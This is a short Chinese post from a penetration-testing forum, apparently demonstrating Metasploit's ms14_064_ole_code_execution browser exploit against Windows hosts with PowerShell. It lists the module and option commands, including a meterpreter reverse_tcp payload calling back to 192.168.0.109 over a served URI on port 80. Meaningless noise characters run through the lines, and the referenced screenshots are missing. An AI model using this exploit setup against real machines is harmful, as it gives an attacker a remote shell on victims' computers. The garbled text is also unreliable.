# ?6 ] ^7 V+ ` 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示0 q* T! H4 Y% |- e$ S0 U! w# x
; c( a3 m1 g: f! Q+ z
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ' | ?8 N1 O# i2 T' G; t" f" Y
; G/ M! @4 L% B! j/ K& F+ p 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
set AllowPowershellPrompt true
Set LHOST 192.168.0.109+ h, i0 U* { P) T. M
set SRVHOST 192.168.0.109
: U: Z- u* V' |( n/ e& X0 @ Set uripath share
0 l0 n2 {9 u% e2 j7 k CSet srvport 80
: S7 i* c6 D" x4 T E5 A8 }
' d1 D1 ~3 B8 M1 g3 E3 T+ s2 p
( `; w6 @# Y4 @, Z& A( z
' D. ~" E" ^" k K, C- [
下面我们来访问本地地址如图:" ^( r3 ~4 p7 ?8 G2 V6 J1 Q
. O! M2 j5 d; E. c
+ Z% w; O! @1 e8 n6 P2 h: V1 p
; j0 d( J( K$ X$ S
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |